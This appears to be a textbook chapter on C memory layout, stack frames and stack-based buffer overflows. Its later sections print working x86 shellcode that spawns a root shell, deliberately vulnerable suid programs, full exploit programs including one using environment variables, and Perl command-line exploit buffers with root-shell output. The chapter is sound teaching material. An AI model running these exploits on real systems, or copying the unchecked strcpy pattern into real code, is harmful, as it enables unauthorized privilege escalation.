When programming in a high-level language, like C, variables are declared using a data type. These data types can range from integers to characters to custom user-defined structures. One reason this is necessary is to properly allocate space for each variable. An integer needs to have 4 bytes of space, while a character only needs a single byte. This means that an integer has 32 bits of space (4,294,967,296 possible values), while a character has only 8 bits of space (256 possible values). In addition, variables can be declared in arrays. An array is just a list of N elements of a specific data type. So a 10-character array is simply 10 adjacent characters located in memory. An array is also referred to as a buffer, and a character array is also referred to as a string. Because copying large buffers around is very computationally expensive, pointers are often used to store the address of the beginning of the buffer. Pointers are declared by prepending an asterisk to the variable name. Here are some examples of variable declarations in C:

int integer_variable;
char character_variable;
char character_array[10];
char *buffer_pointer;

One important detail of memory on x86 processors is the byte order of 4-byte words. The ordering is known as little endian, meaning that the least significant byte is first. Ultimately, this means that the bytes are stored in memory in reverse for 4-byte words, such as integers and pointers. The hexadecimal value 0x12345678 stored in little endian would look like 0x78563412 in memory. Even though compilers for high-level languages such as C will account for the byte ordering automatically, this is an important detail to remember.

0x252 Null Byte Termination

Sometimes a character array will have ten bytes allocated to it, but only four bytes will actually be used. If the word "test" is stored in a character array with ten bytes allocated for it, there will be extra bytes at the end that aren't needed. A zero, or null byte, delimiter is used to terminate the string and tell any function that is dealing with the string to stop operations there.

byte:     0   1   2   3   4   5   6   7   8   9
content:  t   e   s   t   0   X   X   X   X   X

So a function that copies the above string from this character buffer to a different location would only copy "test", stopping at the null byte, instead of copying the entire buffer. Similarly, a function that prints the contents of a character buffer would only print the word "test", instead of printing out "test" followed by several random bytes of data that might be found afterward. Terminating strings with null bytes increases efficiency and allows display functions to work more naturally.
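Both details can be observed directly with a short C sketch (variable names invented): it dumps the bytes of an integer as they sit in memory, and shows a string function stopping at the null byte:

#include <stdio.h>
#include <string.h>

int main(void)
{
    int value = 0x12345678;
    unsigned char *byte = (unsigned char *)&value;
    char buffer[10] = {'t', 'e', 's', 't', 0, 'X', 'X', 'X', 'X', 'X'};
    int i;

    /* On a little-endian x86 machine this prints "78 56 34 12":
       the least significant byte sits at the lowest address. */
    for (i = 0; i < 4; i++)
        printf("%02x ", byte[i]);
    printf("\n");

    /* strlen() stops counting at the null byte, so this prints 4,
       even though 10 bytes are allocated. */
    printf("string length: %d\n", (int)strlen(buffer));
    return 0;
}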
0x253 Program Memory Segmentation

Program memory is divided into five segments: text, data, bss, heap, and stack. Each segment represents a special portion of memory that is set aside for a certain purpose.

The text segment is also sometimes called the code segment. This is where the assembled machine language instructions of the program are located. The execution of instructions in this segment is non-linear, thanks to the aforementioned high-level control structures and functions, which compile into branch, jump, and call instructions in assembly language. As a program executes, the EIP is set to the first instruction in the text segment. The processor then follows an execution loop that does the following:

1. Read the instruction that EIP is pointing to.
2. Add the byte-length of the instruction to EIP.
3. Execute the instruction that was read in step 1.
4. Go to step 1.

Sometimes the instruction will be a jump or a call instruction, which changes the EIP to a different address of memory. The processor doesn't care about the change, because it's expecting the execution to be non-linear anyway. So if the EIP is changed in step 3, the processor will just go back to step 1 and read the instruction found at the address of whatever the EIP was changed to.

Write permission is disabled in the text segment, as it is not used to store variables, only code. This prevents people from actually modifying the program code, and any attempt to write to this segment of memory will cause the program to alert the user that something bad happened and kill the program. Another advantage of this segment being read-only is that it can be shared between different copies of the program, allowing multiple executions of the program at the same time without any problems. It should also be noted that this memory segment has a fixed size, because nothing ever changes in it.

The data and bss segments are used to store global and static program variables. The data segment is filled with the initialized global variables, strings, and other constants that are used throughout the program. The bss segment is filled with the uninitialized counterparts. Although these segments are writable, they also have a fixed size.

The heap segment is used for the rest of the program variables. One notable point about the heap segment is that it isn't of fixed size, meaning it can grow larger or smaller as needed. All of the memory within the heap is managed by allocator and deallocator algorithms, which respectively reserve a region of memory in the heap for use and remove reservations to allow that portion of memory to be reused for later reservations. The heap will grow and shrink depending on how much memory is reserved for use. The growth of the heap moves downward toward higher memory addresses.

The stack segment also has variable size and is used as a temporary scratchpad to store context during function calls. When a program calls a function, that function will have its own set of passed variables, and the function's code will be at a different memory location in the text (or code) segment. Because the context and the EIP must change when a function is called, the stack is used to remember all of the passed variables and where the EIP should return to after the function is finished.

In general computer science terms, a stack is an abstract data structure that is used frequently. It has first-in, last-out (FILO) ordering, which means the first item that is put into a stack is the last item to come out of it. Like putting beads on a piece of string that has a giant knot on the end, you can't get the first bead off until you have removed all the other beads. When an item is placed into a stack, it's known as pushing, and when an item is removed from a stack, it's called popping. As the name implies, the stack segment of memory is, in fact, a stack data structure. The ESP register is used to keep track of the address of the end of the stack, which is constantly changing as items are pushed into and popped from it. Because this is very dynamic behavior, it makes sense that the stack is also not of a fixed size. Opposite to the growth of the heap, as the stack changes in size, it grows upward toward lower memory addresses.

The FILO nature of a stack might seem odd, but because the stack is used to store context, it's very useful. When a function is called, several things are pushed to the stack together in a structure called a stack frame. The EBP register (sometimes called the frame pointer (FP) or local base pointer (LB)) is used to reference variables in the current stack frame. Each stack frame contains the parameters to the function, its local variables, and two pointers that are necessary to put things back the way they were: the saved frame pointer (SFP) and the return address.
The saved frame pointer is used to restore EBP to its previous value, and the return address is used to restore EIP to the next instruction found after the function call. Here's an example test function and main function:

void test_function(int a, int b, int c, int d)
{
    char flag;
    char buffer[10];
}

void main()
{
    test_function(1, 2, 3, 4);
}

This small code segment first declares a test function that has four arguments, which are all declared as integers: a, b, c, and d. The local variables for the function include a single character called flag and a 10-character buffer called buffer. The main function is executed when the program is run, and it simply calls the test function.

When test_function() is called from the main function, the various values are pushed to the stack to create the stack frame as follows. First, the function arguments are pushed onto the stack in reverse order (because it's FILO). The arguments for the function are 1, 2, 3, and 4, so the subsequent push instructions push 4, 3, 2, and finally 1 onto the stack. These values correspond to the variables d, c, b, and a in the function.

When the assembly "call" instruction is executed, to change the execution context to test_function(), the return address is pushed onto the stack. This value will be the location of the instruction following the current EIP — specifically the value stored during step 3 of the previously mentioned execution loop. The storage of the return address is followed by what is called the procedure prologue. In this step, the current value of EBP is pushed to the stack. This value is called the saved frame pointer (SFP) and is later used to restore EBP back to its original state. The current value of ESP is then copied into EBP to set the new frame pointer. Finally, memory is allocated on the stack for the local variables of the function (flag and buffer) by subtracting from ESP. The memory allocated for these local variables isn't pushed to the stack, so the variables are in expected order. In the end, the stack frame looks something like this:

[stack frame diagram, from low memory addresses to high: buffer, flag, saved frame pointer (SFP), return address (ret), then the arguments a, b, c, d]

Local variables are referenced by subtracting from the frame pointer EBP, and the function arguments are referenced by adding to it. When a function is called, the EIP is changed to the address of the beginning of the function in the text (or code) segment of memory to execute it. Memory in the stack is used for the function's local variables and the function arguments. After the execution finishes, the entire stack frame is popped off the stack, and the EIP is set to the return address so the program can continue execution. If another function were called within the function, another stack frame would be pushed onto the stack, and so on. As each function ends, its stack frame is popped off the stack so execution can be returned to the previous function. This behavior is why this segment of memory is organized in a FILO data structure.

The various segments of memory are arranged in the order they were presented, from the lower memory addresses to the higher memory addresses. Because most people are familiar with seeing lists that count downward, the smaller memory addresses are shown at the top. Because the heap and the stack are both dynamic, they both grow in different directions toward each other. This minimizes wasted space and the possibility of either segment growing into the other.
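The segment layout can be observed from within a program. The following C sketch (names invented) prints an address from each segment; on a typical 32-bit x86 Linux system the text, data, bss, and heap addresses would come out lower than the stack address, though the exact values vary from system to system:

#include <stdio.h>
#include <stdlib.h>

int global_initialized = 5;       /* data segment */
int global_uninitialized;         /* bss segment */

int main(void)
{
    int stack_var;                            /* stack segment */
    int *heap_var = malloc(sizeof(int));      /* heap segment */

    printf("text  (main)           %p\n", (void *)main);
    printf("data  (initialized)    %p\n", (void *)&global_initialized);
    printf("bss   (uninitialized)  %p\n", (void *)&global_uninitialized);
    printf("heap  (malloc'd)       %p\n", (void *)heap_var);
    printf("stack (local)          %p\n", (void *)&stack_var);

    free(heap_var);
    return 0;
}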
0x260 Buffer Overflows

C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer and complicate the language.

While C's simplicity increases the programmer's control and the efficiency of the resulting programs, it can also result in programs that are vulnerable to buffer overflows and memory leaks if the programmer isn't careful. This means that once a variable is allocated memory, there are no built-in safeguards to ensure that the contents of a variable fit into the allocated memory space. If a programmer wants to put ten bytes of data into a buffer that had only been allocated eight bytes of space, that type of action is allowed, even though it will most likely cause the program to crash. This is known as a buffer overrun or overflow, since the extra two bytes of data will overflow and spill out of the end of the allocated memory, overwriting whatever happens to come next. If a critical piece of data is overwritten, the program will crash. The following code offers an example.

overflow.c code

   #include <string.h>
   #include <stdlib.h>

   void overflow_function (char *str)
   {
      char buffer[20];
      strcpy(buffer, str);      // Function that copies str to buffer
   }

   int main()
   {
      char big_string[128];
      int i;
      for(i=0; i < 128; i++)    // Loop 128 times
      {
         big_string[i] = 'A';   // And fill big_string with 'A's
      }
      overflow_function(big_string);
      exit(0);
   }

The preceding code has a function called overflow_function() that takes in a string pointer called str and then copies whatever is found at that memory address into the local function variable buffer, which has 20 bytes allocated for it. The main function of the program allocates a 128-byte buffer called big_string and uses a for loop to fill that buffer with As. Then it calls overflow_function() with a pointer to the 128-byte buffer as its argument. This is going to cause problems, as overflow_function() will try to cram 128 bytes of data into a buffer that only has 20 bytes allocated to it. The remaining 108 bytes of data will just spill out over whatever is found after it in memory space. Here are the results:

$ gcc -o overflow overflow.c
$ ./overflow
Segmentation fault
$

The program crashed as a result of the overflow. For a programmer, these types of errors are common and are fairly easy to fix (a sketch of the fix appears at the end of this section), as long as the programmer knows how big the expected input is going to be. Often, the programmer will anticipate that a certain user input will always be a certain length and will use that as a guide. But once again, hacking involves thinking about things that weren't anticipated, and a program that runs fine for years might suddenly crash when a hacker decides to try inputting a thousand characters into a field that normally only uses several dozen, like a username field.

So a clever hacker can cause a program to crash by inputting unanticipated values that cause buffer overflows, but how can this be used to take control of a program? The answer can be found by examining the data that actually gets overwritten.
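As for the fix mentioned above: the usual remedy is simply to bound the copy by the size of the destination. Here is a minimal sketch — my own illustration, not from the original text:

   #include <stdio.h>
   #include <string.h>

   void safe_function(char *str)
   {
      char buffer[20];

      /* Copy at most 19 bytes and guarantee null termination,
         so oversized input is truncated instead of overflowing. */
      strncpy(buffer, str, sizeof(buffer) - 1);
      buffer[sizeof(buffer) - 1] = '\0';
      printf("Copied: %s\n", buffer);
   }

   int main(void)
   {
      char big_string[128];

      memset(big_string, 'A', sizeof(big_string) - 1);
      big_string[sizeof(big_string) - 1] = '\0';
      safe_function(big_string);   /* truncates cleanly instead of crashing */
      return 0;
   }

With the bounds check in place, the 128-byte input is cut down to fit, and the program runs to completion.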
0x270 Stack-Based Overflows

Referring back to the sample overflow program, overflow.c: when overflow_function() is called, a stack frame is pushed onto the stack. When the function is first called, the stack frame looks something like this (the original figure isn't reproduced here; from the lower memory addresses to the higher ones):

   [ buffer (20 bytes) ] [ SFP ] [ return address ] [ str ]

But when the function tries to write 128 bytes of data into the 20-byte buffer, the extra 108 bytes spill out, overwriting the saved frame pointer, the return address, and the str pointer function argument. Then, when the function finishes, the program attempts to jump to the return address, which is now filled with As (0x41 in hexadecimal). The program tries to return to this address, causing the EIP to go to 0x41414141, which is basically just some random address that is either in the wrong memory space or contains invalid instructions, causing the program to crash and die. This is called a stack-based overflow, because the overflow is occurring in the stack memory segment.

Overflows can happen in other memory segments also, such as the heap or bss segments, but what makes stack-based overflows more versatile and interesting is that they can overwrite a return address. The program crashing as a result of a stack-based overflow isn't really that interesting, but the reason it crashes is. If the return address were controlled and overwritten with something other than 0x41414141 — such as an address where actual executable code was located — then the program would "return" to and execute that code instead of dying. And if the data that overflows into the return address is based on user input, such as the value entered in a username field, the return address and the subsequent program execution flow can be controlled by the user.

Because it's possible to modify the return address to change the flow of execution by overflowing buffers, all that's needed is something useful to execute. This is where bytecode injection comes into the picture. Bytecode is just a cleverly designed piece of assembly code that is self-contained and can be injected into buffers. There are several restrictions on bytecode: It has to be self-contained, and it needs to avoid certain special characters in its instructions, because it's supposed to look like data in buffers.

The most common piece of bytecode is known as shellcode. This is a piece of bytecode that just spawns a shell (a C-level view of this payload appears at the end of this section). If a suid root program is tricked into executing shellcode, the attacker will have a user shell with root privileges, while the system believes the suid root program is still doing whatever it was supposed to be doing. Here is an example:

vuln.c code

   #include <string.h>

   int main(int argc, char *argv[])
   {
      char buffer[500];
      strcpy(buffer, argv[1]);
      return 0;
   }

This is a piece of vulnerable program code that is similar to overflow_function() from before, as it takes a single argument and tries to cram whatever that argument holds into its 500-byte buffer. Here are the uneventful results of this program's compilation and execution:

$ gcc -o vuln vuln.c
$ ./vuln test

The program really does nothing, except mismanage memory. To make it truly vulnerable, the ownership must be changed to the root user, and the suid permission bit must be turned on for the compiled binary:

$ sudo chown root vuln
$ sudo chmod +s vuln
$ ls -l vuln
-rwsr-sr-x    1 root     users        4933 Sep  5 15:22 vuln

Now that vuln is a suid root program that's vulnerable to a buffer overflow, all that's needed is a piece of code to generate a buffer that can be fed to the vulnerable program. This buffer should contain the desired shellcode and should overwrite the return address in the stack so that the shellcode will get executed.
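As promised, here is a C-level view of what the 46-byte shellcode used throughout this chapter does. This is my own reading of the payload, offered purely as an illustration; the real thing is hand-written assembly, carefully arranged to contain no null bytes:

   #include <unistd.h>

   int main(void)
   {
      char *args[] = { "/bin/sh", NULL };

      setreuid(0, 0);                  /* set real and effective user ID to root,
                                          so the spawned shell keeps its privileges */
      execve("/bin/sh", args, NULL);   /* replace the process with a shell */
      return 0;
   }

The challenge, of course, is getting the vulnerable program to jump to these instructions.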
For that to happen, the actual address of the shellcode must be known ahead of time, which can be difficult in a dynamically changing stack. To make things even harder, the four bytes where the return address is stored in the stack frame must be overwritten with the value of that address. Even if the correct address is known, but the proper location isn't overwritten, the program will just crash and die. Two techniques are commonly used to assist with this difficult chicanery.

The first is known as a NOP sled (NOP is short for no operation). A NOP is a single-byte instruction that does absolutely nothing. These are sometimes used to waste computational cycles for timing purposes and are actually necessary in the Sparc processor architecture, due to instruction pipelining. In this case, these NOP instructions are going to be used for a different purpose: as a fudge factor. By creating a large array (or sled) of these NOP instructions and placing it before the shellcode, if the EIP returns to any address found in the NOP sled, the EIP will increment while executing each NOP instruction, one at a time, until it finally reaches the shellcode. This means that as long as the return address is overwritten with any address found in the NOP sled, the EIP will slide down the sled to the shellcode, which will execute properly.

The second technique is flooding the end of the buffer with many back-to-back instances of the desired return address. This way, as long as any one of these return addresses overwrites the actual return address, the exploit will work as desired. Here is a representation of a crafted buffer (the original figure isn't reproduced here):

   [ NOP sled ] [ shellcode ] [ repeated return address ]

Even using both of these techniques, the approximate location of the buffer in memory must be known in order to guess the proper return address. One technique for approximating the memory location is to use the current stack pointer as a guide. By subtracting an offset from this stack pointer, the relative address of any variable can be obtained. Because, in this vulnerable program, the first element on the stack is the buffer the shellcode is being put into, the proper return address should be the stack pointer itself, which means the offset should be close to 0. The NOP sled becomes increasingly useful when exploiting more complicated programs, where the offset isn't 0.

The following is exploit code, designed to create a buffer and feed it to the vulnerable program, hopefully tricking it into executing the injected shellcode when it crashes, instead of just crashing and dying. The exploit code first gets the current stack pointer and subtracts an offset from it; in this case the offset is 0. Then memory for the buffer is allocated (on the heap), and the entire buffer is filled with the return address. Next, the first 200 bytes of the buffer are filled with a NOP sled (the NOP instruction in machine language for the x86 processor is 0x90). Then the shellcode is placed after the NOP sled, leaving the remaining last portion of the buffer filled with the return address. Because the end of a character buffer is designated by a null byte, or 0, the buffer is ended with a 0. Finally, another function is used to run the vulnerable program and feed it the specially crafted buffer.
exploit.c code

   #include <stdio.h>
   #include <stdlib.h>
   #include <string.h>
   #include <unistd.h>

   char shellcode[] =
   "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
   "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
   "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
   "\x68";

   unsigned long sp(void)            // This is just a little function
   { __asm__("movl %esp, %eax");}    // used to return the stack pointer

   int main(int argc, char *argv[])
   {
      int i, offset;
      long esp, ret, *addr_ptr;
      char *buffer, *ptr;

      offset = 0;                    // Use an offset of 0
      esp = sp();                    // Put the current stack pointer into esp
      ret = esp - offset;            // We want to overwrite the ret address

      printf("Stack pointer (ESP) : 0x%x\n", esp);
      printf("    Offset from ESP : 0x%x\n", offset);
      printf("Desired Return Addr : 0x%x\n", ret);

      // Allocate 600 bytes for buffer (on the heap)
      buffer = malloc(600);

      // Fill the entire buffer with the desired ret address
      ptr = buffer;
      addr_ptr = (long *) ptr;
      for(i=0; i < 600; i+=4)
      { *(addr_ptr++) = ret; }

      // Fill the first 200 bytes of the buffer with NOP instructions
      for(i=0; i < 200; i++)
      { buffer[i] = '\x90'; }

      // Put the shellcode after the NOP sled
      ptr = buffer + 200;
      for(i=0; i < strlen(shellcode); i++)
      { *(ptr++) = shellcode[i]; }

      // End the string
      buffer[600-1] = 0;

      // Now call the program ./vuln with our crafted buffer as its argument
      execl("./vuln", "vuln", buffer, 0);

      // Free the buffer memory
      free(buffer);

      return 0;
   }

Here are the results of the exploit code's compilation and subsequent execution:

$ gcc -o exploit exploit.c
$ ./exploit
Stack pointer (ESP) : 0xbffff978
    Offset from ESP : 0x0
Desired Return Addr : 0xbffff978
sh-2.05a# whoami
root
sh-2.05a#

Apparently it worked. The return address in the stack frame was overwritten with the value 0xbffff978, which happens to be the address of the NOP sled and shellcode. Because the program was suid root, and the shellcode was designed to spawn a user shell, the vulnerable program executed the shellcode as the root user, even though the original program was only meant to copy a piece of data and exit.

0x271 Exploiting Without Exploit Code

Writing an exploit program to exploit a program will certainly get the job done, but it does put a layer between the prospective hacker and the vulnerable program. The compiler takes care of certain aspects of the exploit, and having to adjust the exploit by making changes to a program removes a certain level of interactivity from the exploit process. In order to really gain a full understanding of this topic, which is so rooted in exploration and experimentation, the ability to quickly try different things is vital. Perl's print command and the bash shell's command substitution with grave accents are really all that are needed to exploit the vulnerable program.

Perl is an interpreted programming language with a print command that happens to be particularly suited to generating long sequences of characters. Perl can be used to execute instructions on the command line using the -e switch, like this:

$ perl -e 'print "A" x 20;'
AAAAAAAAAAAAAAAAAAAA

This command tells Perl to execute the commands found between the single quotes — in this case, a single command of print "A" x 20;, which prints the character A 20 times. Any character, such as a nonprintable character, can also be printed by using \x##, where ## is the hexadecimal value of the character. In the following example, this notation is used to print the character A, which has the hexadecimal value of 0x41.
$ perl -e 'print "\x41" x 20;' AAAAAAAAAAAAAAAAAAAA In addition, string concatenation can be done in Perl with the period (.) character. This can be useful when stringing multiple addresses together. $ perl -e 'print "A"x20. "BCD". "\x61\x66\x67\x69"x2. "Z";' AAAAAAAAAAAAAAAAAAAABCDafgiafgiZ Command substitution is done with the grave accent (‘) — the character that looks like a tilted single quote and is found on the same key as the tilde. Anything found between two sets of grave accents is executed, and the output is put in its place. Here are two examples: $ 'perl -e 'print "uname";'' Linux $ una'perl -e 'print "m";''e Linux $ In each case, the output of the command found between the grave accents is substituted for the command, and the command of uname is executed. All the exploit code really does is get the stack pointer, craft a buffer, and feed that buffer to the vulnerable program. Armed with Perl, command substitution, and an approximate return address, the work of the exploit code can be done on the command line by simply executing the vulnerable program and using grave accents to substitute a crafted buffer into the first argument. First the NOP sled must be created. In the exploit.c code, 200 bytes of NOP sled was used; this is a good amount, as it provides for 200 bytes of guessing room for the return address. This extra guessing room is more important now, because the exact stack pointer address isn't known. Remembering that the NOP instruction is 0x90 in hexadecimal, the sled can be created using a pair of grave accents and Perl, as follows: $./vuln 'perl -e 'print "\x90"x200;'' The shellcode should then be appended to the NOP sled. It's quite useful to have the shellcode existing in a file somewhere, so putting the shellcode into a file should be the next step. Because all the bytes are already spelled out in hexadecimal in the beginning of the exploit, these bytes just need to be written to a file. This can be done using a hex editor or using Perl's print command with the output redirected to a file, as shown here: $ perl -e 'print "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x8 9\x 43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x 73\ x68";' > shellcode Once this is done, the shellcode exists in a file called "shellcode". The shellcode can now be easily inserted anywhere with a pair of grave accents and the cat command. Using this method, the shellcode can be added to the existing NOP sled: $./vuln 'perl -e 'print "\x90"x200;'"cat shellcode' Next, the return address, repeated several times, must be appended, but there is already something wrong with the exploit buffer. In the exploit.c code, the exploit buffer was filled with the return address first. This made sure the return address was properly aligned, because it consists of four bytes. This alignment must be manually accounted for when crafting exploit buffers on the command line. What this boils down to is this: The number of bytes in the NOP sled plus the shellcode must be divisible by 4. Because the shellcode is 46 bytes, and the NOP sled is 200 bytes, a bit of simple arithmetic will show that 246 isn't divisible by 4. It is off by 2 bytes, so the repeated return address will be misaligned by 2 bytes, causing the execution to return somewhere unexpected. 
Next, the return address, repeated several times, must be appended — but there is already something wrong with the exploit buffer. In the exploit.c code, the exploit buffer was filled with the return address first. This made sure the return address was properly aligned, because it consists of four bytes. This alignment must be manually accounted for when crafting exploit buffers on the command line. What this boils down to is this: The number of bytes in the NOP sled plus the shellcode must be divisible by 4. Because the shellcode is 46 bytes and the NOP sled is 200 bytes, a bit of simple arithmetic will show that 246 isn't divisible by 4 — it is off by 2 bytes — so the repeated return address would be misaligned by 2 bytes, causing the execution to return somewhere unexpected.

In order to properly align the section of repeated return addresses, an additional 2 bytes should be added to the NOP sled:

$ ./vuln `perl -e 'print "\x90"x202;'``cat shellcode`

Now that the first part of the exploit buffer is properly aligned, the repeated return address just has to be added to the end. Because 0xbffff978 was where the stack pointer was last, that makes a good approximate return address. This return address can be printed using "\x78\xf9\xff\xbf" — the bytes are reversed due to the little-endian byte ordering on the x86 architecture. This is a subtlety that can sometimes be overlooked when just using exploit code that does the ordering automatically. Because the target length for the exploit buffer is about 600 bytes, and the NOP sled and shellcode take up 248 bytes, more simple arithmetic reveals that the return address should be repeated 88 times. This can be done with an additional pair of grave accents and more Perl:

$ ./vuln `perl -e 'print "\x90"x202;'``cat shellcode``perl -e 'print "\x78\xf9\xff\xbf"x88;'`
sh-2.05a# whoami
root
sh-2.05a#

Exploiting at the command line provides greater control and flexibility over a given exploit technique, which encourages experimentation. For example, it's doubtful that all 600 bytes are really needed to properly exploit the sample vuln program. This threshold can be quickly explored when using the command line:

$ ./vuln `perl -e 'print "\x90"x202;'``cat shellcode``perl -e 'print "\x68\xf9\xff\xbf"x68;'`
$ ./vuln `perl -e 'print "\x90"x202;'``cat shellcode``perl -e 'print "\x68\xf9\xff\xbf"x69;'`
Segmentation fault
$ ./vuln `perl -e 'print "\x90"x202;'``cat shellcode``perl -e 'print "\x68\xf9\xff\xbf"x70;'`
sh-2.05a#

The first execution doesn't reach far enough to disturb the return address, so the program simply exits cleanly. The second execution overwrites only part of the return address, resulting in a crash. The final execution, however, properly overwrites the whole return address, returning execution into the NOP sled and shellcode, which executes a root shell. This level of control over the exploit buffer, and the immediate feedback from experimentation, is quite valuable in developing a deeper understanding of a system and of an exploit technique.

0x272 Using the Environment

Sometimes a buffer will be too small to even fit shellcode into. In this case, the shellcode can be stashed in an environment variable. Environment variables are used by the user shell for a variety of things, but the key point of interest is that they are stored in an area of memory that program execution can be redirected to. So if a buffer is too small to fit the NOP sled, shellcode, and repeated return address, the sled and shellcode can be stored in an environment variable, with the return address pointing to their location in memory.

Here is another vulnerable piece of code, using a buffer that is too small for shellcode:

vuln2.c code

   #include <string.h>

   int main(int argc, char *argv[])
   {
      char buffer[5];
      strcpy(buffer, argv[1]);
      return 0;
   }

Here the vuln2.c code is compiled and set suid root to make it truly vulnerable:

$ gcc -o vuln2 vuln2.c
$ sudo chown root.root vuln2
$ sudo chmod u+s vuln2

Because the buffer is only five bytes long in vuln2, there is no room for shellcode to be inserted; it must be stored elsewhere. One ideal candidate for holding the shellcode is an environment variable. The execl() function in the exploit.c code, which was used to execute the vulnerable program with the crafted buffer in the first exploit, has a sister function called execle().
This function has one additional argument, which is the environment that the executing process should run under. This environment is presented in the form of an array of pointers to null-terminated strings — one for each environment variable — and the environment array itself is terminated with a null pointer. This means that an environment containing nothing but shellcode can be created by using an array of two pointers, the first of which points to the shellcode and the second of which is a null pointer. Then the execle() function can be called with this environment to execute the second vulnerable program, overflowing the return address with the address of the shellcode.

Luckily, the address of an environment invoked in this manner is easy to calculate. In Linux, the address will be 0xbffffffa, minus the length of the environment, minus the length of the name of the executed program. (With the 46-byte shellcode as the entire environment and the 7-byte program name "./vuln2", that works out to 0xbffffffa − 46 − 7 = 0xbfffffc5.) Because this address will be exact, there is no need for a NOP sled. All that's needed in the exploit buffer is the address, repeated enough times to overflow the return address in the stack. Forty bytes seems like a good number.

env_exploit.c code

   #include <stdlib.h>
   #include <string.h>
   #include <unistd.h>

   char shellcode[] =
   "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
   "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
   "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
   "\x68";

   int main(int argc, char *argv[])
   {
      char *env[] = {shellcode, NULL};
      int i;
      long ret, *addr_ptr;
      char *buffer, *ptr;

      // Allocate 40 bytes for buffer (on the heap)
      buffer = malloc(40);

      // Calculate the location of the shellcode
      ret = 0xbffffffa - strlen(shellcode) - strlen("./vuln2");

      // Fill the entire buffer with the desired ret address
      ptr = buffer;
      addr_ptr = (long *) ptr;
      for(i=0; i < 40; i+=4)
      { *(addr_ptr++) = ret; }

      // End the string
      buffer[40-1] = 0;

      // Now call the program ./vuln2 with our crafted buffer as its argument
      // and using the environment env as its environment.
      execle("./vuln2", "vuln2", buffer, 0, env);

      // Free the buffer memory
      free(buffer);

      return 0;
   }

This is what happens when the program is compiled and executed:

$ gcc -o env_exploit env_exploit.c
$ ./env_exploit
sh-2.05a# whoami
root
sh-2.05a#

Of course, this technique can also be used without an exploit program. In the bash shell, environment variables are set and exported using export VARNAME=value. Using export, Perl, and a few pairs of grave accents, the shellcode and a generous NOP sled can be put into the current environment:

$ export SHELLCODE=`perl -e 'print "\x90"x100;'``cat shellcode`

The next step is to find the address of this environment variable. This can be done using a debugger, such as gdb, or by simply writing a little utility program. I'll explain both methods.

The point of using a debugger is to open the vulnerable program in the debugger and set a breakpoint right at the beginning. This will cause the program to start execution but then stop before anything actually happens. At this point, memory can be examined from the stack pointer forward by using the gdb command x/20s $esp. This will print out the next 20 strings of memory from the stack pointer. The x in the command is short for examine, and the 20s requests 20 null-terminated strings. Pressing ENTER after this command runs will repeat the previous command, examining the next 20 strings' worth of memory. This process can be repeated until the environment variable is found in memory.
In the following output, vuln2 is debugged with gdb to examine strings in stack memory in order to find the shellcode stored in the environment variable SHELLCODE.

$ gdb vuln2
GNU gdb 5.2.1
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(gdb) break main
Breakpoint 1 at 0x804833e
(gdb) run
Starting program: /hacking/vuln2

Breakpoint 1, 0x0804833e in main ()
(gdb) x/20s $esp
0xbffff8d0:     "O\234\002@\204\204\024@ \203\004\bR\202\004\b0\202\004\b..."

[Several screens of raw stack data — mangled beyond recovery in this transcription — are paged through by pressing ENTER after each x/20s until the environment strings appear near the top of the stack:]

0xbffffa60:     "i686"
0xbffffa65:     "/hacking/vuln2"
0xbffffa74:     "PWD=/hacking"
0xbffffa81:     "XINITRC=/etc/X11/xinit/xinitrc"
0xbffffaa0:     "JAVAC=/opt/sun-jdk-1.4.0/bin/javac"
0xbffffac3:     "PAGER=/usr/bin/less"
0xbffffad7:     "SGML_CATALOG_FILES=/etc/sgml/sgml-ent.cat:/etc/sgml/sgml-docbook.cat:/etc/sgml/openjade-1.3.1.cat:/etc/sgml/sgml-docbook-3.1.cat:/etc/sgml/sgml-docbook-3.0.cat:/etc/sgml/dsssl-docbook-stylesheets.cat:"...
0xbffffb9f:     "/etc/sgml/sgml-docbook-4.0.cat:/etc/sgml/sgml-docbook-4.1.cat"
0xbffffbdd:     "HOSTNAME=overdose"
0xbffffbef:     "CLASSPATH=/opt/sun-jdk-1.4.0/jre/lib/rt.jar:."
0xbffffc1d:     "VIMRUNTIME=/usr/share/vim/vim61"
0xbffffc3d:     "MANPATH=/usr/share/man:/usr/local/share/man:/usr/X11R6/man:/opt/insight/man"
0xbffffc89:     "LESSOPEN=|lesspipe.sh %s"
0xbffffca2:     "USER=matrix"
0xbffffcae:     "MAIL=/var/mail/matrix"
0xbffffcc4:     "CVS_RSH=ssh"
0xbffffcd0:     "INPUTRC=/etc/inputrc"
0xbffffce5:     "SHELLCODE=", '\220' <repeats 100 times>, "1\300\260F1\3331\311\315\200\353\026[1\300\210C\a\211[\b\211C\f\260\v\215K\b\215S\f\315\200\350\345\377\377\377/bin/sh"
0xbffffd82:     "EDITOR=/usr/bin/nano"
(gdb)
0xbffffd97:     "CONFIG_PROTECT_MASK=/etc/gconf"
0xbffffdb6:     "JAVA_HOME=/opt/sun-jdk-1.4.0"
0xbffffdd3:     "SSH_CLIENT=10.10.10.107 3108 22"
0xbffffdf3:     "LOGNAME=matrix"
0xbffffe02:     "SHLVL=1"
0xbffffe0a:     "MOZILLA_FIVE_HOME=/usr/lib/mozilla"
0xbffffe2d:     "INFODIR=/usr/share/info:/usr/X11R6/info"
